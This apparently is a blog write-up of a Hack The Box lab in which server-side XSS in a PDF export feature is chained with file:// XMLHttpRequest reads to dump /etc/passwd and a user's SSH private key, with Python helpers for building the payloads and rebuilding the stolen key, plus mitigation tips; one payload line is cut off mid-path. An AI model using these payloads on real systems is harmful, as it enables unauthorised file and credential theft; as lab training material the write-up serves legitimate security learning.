XSS to Exfiltrate Data from PDFs

by Nairuz Abulhul

While working on the Book machine on Hack The Box (Scripting Track), I came across a web application that uses user-controlled input to generate PDF files: whatever the user enters is rendered into the PDF file when it is downloaded.

I was aware of the XSS and SSRF vulnerabilities tied to dynamically generated PDFs from reading many bug bounty write-ups, but I hadn’t tried exploiting them myself until I came across the Book machine.

When I saw that the download functionality generated a new PDF file every time I clicked the PDF link, I went back to the bug bounty articles about this vulnerability to refresh my memory on how to exploit it 😃.

I found that an attacker can craft JavaScript code that executes on the server side and retrieves the contents of internal files. It is essentially a stored XSS vulnerability that can be escalated by chaining it with Local File Inclusion (LFI) or Server-Side Request Forgery (SSRF) to exfiltrate internal data.


  • Server-Side Request Forgery

In this post, I will focus on exploiting the XSS vulnerability and combining it with LFI to retrieve the contents of internal files. For the demonstration, I’ll be using the Book machine.


In the user portal, the user can upload files on the Collections page under the Book Submission section.

In the admin panel, the Collections page can export the list of collections (the files supposedly uploaded from the user portal) to PDF format when you click the PDF link.

Collections page on the admin’s portal

Functionality that generates PDF files from user input is often vulnerable to server-side XSS, which can lead to data being exfiltrated from the vulnerable application.

So, I put together a checklist of the essential tests to run against the application:


  • Try injecting HTML tags to see whether the application parses the HTML code.
  • Test different protocols (e.g., file, HTTP, HTTPS) when reading internal files.
  • Use JS injections to read internal server files.
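The first two checklist items can be turned into concrete probes. Below is a minimal Python sketch, assuming each probe is submitted in a separate request (an onerror handler that calls document.write after the page has finished loading can replace the whole page, wiping out other content) and that the PDF's text is then extracted, for example with pdf2txt.py. The marker words htmlprobe and jsprobe and the helper name interpret are hypothetical, not part of the Book application.

```python
# Hypothetical probe payloads for the first two checklist items. The marker
# words are arbitrary strings chosen so they are easy to spot in the PDF text.
HTML_PROBE = "<h1>htmlprobe</h1>"
JS_PROBE = "<img src=\"x\" onerror=\"document.write('jsprobe')\" />"


def interpret(pdf_text: str) -> dict:
    """Guess how the PDF generator treated a probe, from the PDF's extracted text."""
    return {
        # Tags were parsed: the marker text is present but the literal tag is not.
        "html_parsed": "htmlprobe" in pdf_text and "<h1>" not in pdf_text,
        # JS ran: document.write's output is present but the payload source is not.
        "js_executed": "jsprobe" in pdf_text and "onerror" not in pdf_text,
    }


if __name__ == "__main__":
    print(HTML_PROBE)
    print(JS_PROBE)
    # If the payload shows up verbatim in the PDF, the input was escaped.
    print(interpret(JS_PROBE))
```

If the payload text appears verbatim in the PDF, the input was escaped; if only the marker word appears, the generator parsed (or executed) it.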

📌Synack Tip

1- Identify injectable inputs

The injectable inputs are the Book Title and Author fields.

2- HTML Injection


Intercept the request in Burp Suite to inspect the details of the request we are sending to the application.

Once the request is sent, we switch to the admin panel and click the PDF link to generate the PDF file.

PDF Export link

Once it is generated, we open the file and see that the HTML tags were parsed on the backend and rendered into the file. AWESOME!!

3- JS injections to read internal server files

<img src="x" onerror="document.write('test')" />
Injecting JS into the input fields
JS executed when the PDF was generated

As we can see, the JS code was executed and the word "test" was included in the file. The next step is to identify the protocol the application uses to load the page, which tells us how to read internal files on the server 😈.

I used a one-liner to write the full URL of the current page into the PDF.


As we can see, the application uses the file:/// protocol.
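To see why the scheme matters, here is a minimal sketch that splits a leaked location URL with Python's urllib.parse.urlparse. A URL such as file:///etc/hosts consists of the file scheme, an empty host (meaning the local machine), and the absolute path /etc/hosts, which is where the three slashes come from. The leaked value below is hypothetical, and so is the helper name; a common way to leak it is a one-liner like <script>document.write(document.location.href)</script>, though that is not necessarily the exact one used on Book.

```python
from urllib.parse import urlparse


def describe_location(href: str) -> dict:
    """Split a leaked document.location URL into the parts that matter here."""
    parts = urlparse(href)
    return {
        "scheme": parts.scheme,  # "file" means the page was loaded from disk
        "host": parts.netloc,  # empty for file:/// URLs (the local machine)
        "path": parts.path,  # where the rendered HTML lives on the server
        "local_file": parts.scheme == "file",
    }


if __name__ == "__main__":
    # Hypothetical leaked value; the real path on Book is not shown here.
    print(describe_location("file:///tmp/hypothetical-export.html"))
```

A file scheme suggests that other file:// URLs may be reachable from the same page, although whether the renderer actually allows such requests depends on the rendering engine and its settings.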

Next, we can retrieve the contents of the /etc/hosts and /etc/passwd files using XMLHttpRequest (XHR):

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open('GET','file:///etc/hosts');x.send();</script>

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open('GET','file:///etc/passwd');x.send();</script>
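Both payloads follow the same pattern, so they can be generated for any absolute path. Below is a minimal Python sketch, assuming the renderer permits XHR to file:// URLs as it did here. The function name xhr_read_payload is hypothetical. json.dumps is used to produce a properly escaped JavaScript string literal, so the URL ends up double-quoted rather than single-quoted as in the payloads above.

```python
import json


def xhr_read_payload(path: str) -> str:
    """Build the <script> XHR payload that writes a local file into the page."""
    if not path.startswith("/"):
        raise ValueError("expected an absolute path such as /etc/hosts")
    # "file://" + an absolute path gives the three-slash form, e.g. file:///etc/hosts.
    # json.dumps yields a correctly escaped JavaScript string literal.
    url_literal = json.dumps("file://" + path)
    return (
        "<script>"
        "x=new XMLHttpRequest;"
        # When the response arrives, write its text into the page (and the PDF).
        "x.onload=function(){document.write(this.responseText)};"
        f"x.open('GET',{url_literal});"
        "x.send();"
        "</script>"
    )


if __name__ == "__main__":
    for target in ("/etc/hosts", "/etc/passwd"):
        print(xhr_read_payload(target))
```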

/etc/passwd file
/etc/hosts file

4- Retrieve the SSH key and get access to the machine

By default on Linux, the SSH private key (id_rsa) resides in the hidden .ssh directory inside the user’s home directory. In our case, that is /home/reader/.ssh/id_rsa.

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reade

With that, I read the file from the default path and extracted the contents of the key.

SSH private key

Next, I needed to convert the PDF to text to extract the key, since I couldn’t copy it directly from the PDF file. I used the pdf2txt.py script from GitHub to do so.

The script is part of the pdfminer tool collection.

pdfminer collection on GitHub

Passing the PDF file that contains the SSH key to the pdf2txt.py script gives us the key:

python3 pdf2txt.py ssh.pdf
Reader’s SSH Key
SSH shell
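If you would rather script the key extraction than clean it up by hand, here is a minimal Python sketch. It assumes the key is an unencrypted PEM-style block (no Proc-Type or DEK-Info headers) and that the extracted text may contain stray spaces or line breaks inside the base64 body, since document.write output is rendered as HTML and the key's newlines can collapse into spaces. The function names and the 64-character re-wrap width (the usual PEM line length) are my assumptions. The optional key_from_pdf helper assumes pdfminer.six is installed and uses its pdfminer.high_level.extract_text function. The key file is restricted to mode 0600 because ssh refuses private keys that other users can read.

```python
import os
import re

# BEGIN/END markers must carry the same label, e.g. "RSA PRIVATE KEY".
KEY_RE = re.compile(
    r"-----BEGIN ([A-Z ]*PRIVATE KEY)-----(.*?)-----END \1-----", re.DOTALL
)


def extract_private_key(text: str, width: int = 64) -> str:
    """Rebuild a PEM-style private key from text extracted out of a PDF."""
    match = KEY_RE.search(text)
    if match is None:
        raise ValueError("no private key block found")
    label, body = match.group(1), match.group(2)
    # Drop all whitespace that rendering/extraction introduced, then re-wrap
    # the base64 body (assumes an unencrypted key with no header lines).
    b64 = re.sub(r"\s+", "", body)
    lines = [b64[i:i + width] for i in range(0, len(b64), width)]
    return "\n".join([f"-----BEGIN {label}-----", *lines, f"-----END {label}-----"]) + "\n"


def save_key(path: str, pem: str) -> None:
    """Write the key and restrict it to the owner (ssh rejects open permissions)."""
    with open(path, "w") as fh:
        fh.write(pem)
    os.chmod(path, 0o600)


def key_from_pdf(pdf_path: str) -> str:
    """Optional: extract text with pdfminer.six (assumed installed), then the key."""
    from pdfminer.high_level import extract_text

    return extract_private_key(extract_text(pdf_path))
```

For example, pem = key_from_pdf("ssh.pdf") followed by save_key("id_rsa", pem) would leave an id_rsa file that can be passed to ssh -i id_rsa reader@<target>.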


  • HTML-encode all characters used in XSS and HTML payloads (such as < > " ' &) before rendering user input into the PDF.
  • Implement a WAF solution in front of the application.
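To illustrate the encoding recommendation, here is a minimal Python sketch contrasting user input pasted directly into the HTML that feeds the PDF generator with the same input escaped first. The row template and function names are hypothetical (Book’s actual template isn’t shown), and Python’s html.escape stands in for whatever escaping function the application’s own language provides.

```python
import html

# Hypothetical row template for one collection entry in the exported PDF.
ROW_TEMPLATE = "<tr><td>{title}</td><td>{author}</td></tr>"


def render_row_unsafe(title: str, author: str) -> str:
    # Vulnerable pattern: user input is pasted into the HTML as-is.
    return ROW_TEMPLATE.format(title=title, author=author)


def render_row_safe(title: str, author: str) -> str:
    # html.escape converts & < > " ' into entities, so the renderer displays
    # the payload as text instead of parsing it as tags or script.
    return ROW_TEMPLATE.format(
        title=html.escape(title, quote=True),
        author=html.escape(author, quote=True),
    )


if __name__ == "__main__":
    payload = "<img src=\"x\" onerror=\"document.write('test')\" />"
    print(render_row_unsafe(payload, "reader"))
    print(render_row_safe(payload, "reader"))
```

With the escaped version, the PDF would show the payload as literal text rather than executing it.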

That’s all for today. Thanks for reading !!!

About the author

Nairuz Abulhul

I spend 70% of the time reading security stuff and 30% trying to make it work !!! aka Pentester >>Security Researcher

Featured graphics: https://unsplash.com/photos/CbeApl8sxxw (Fredrik Öhlander)

August 10, 2021
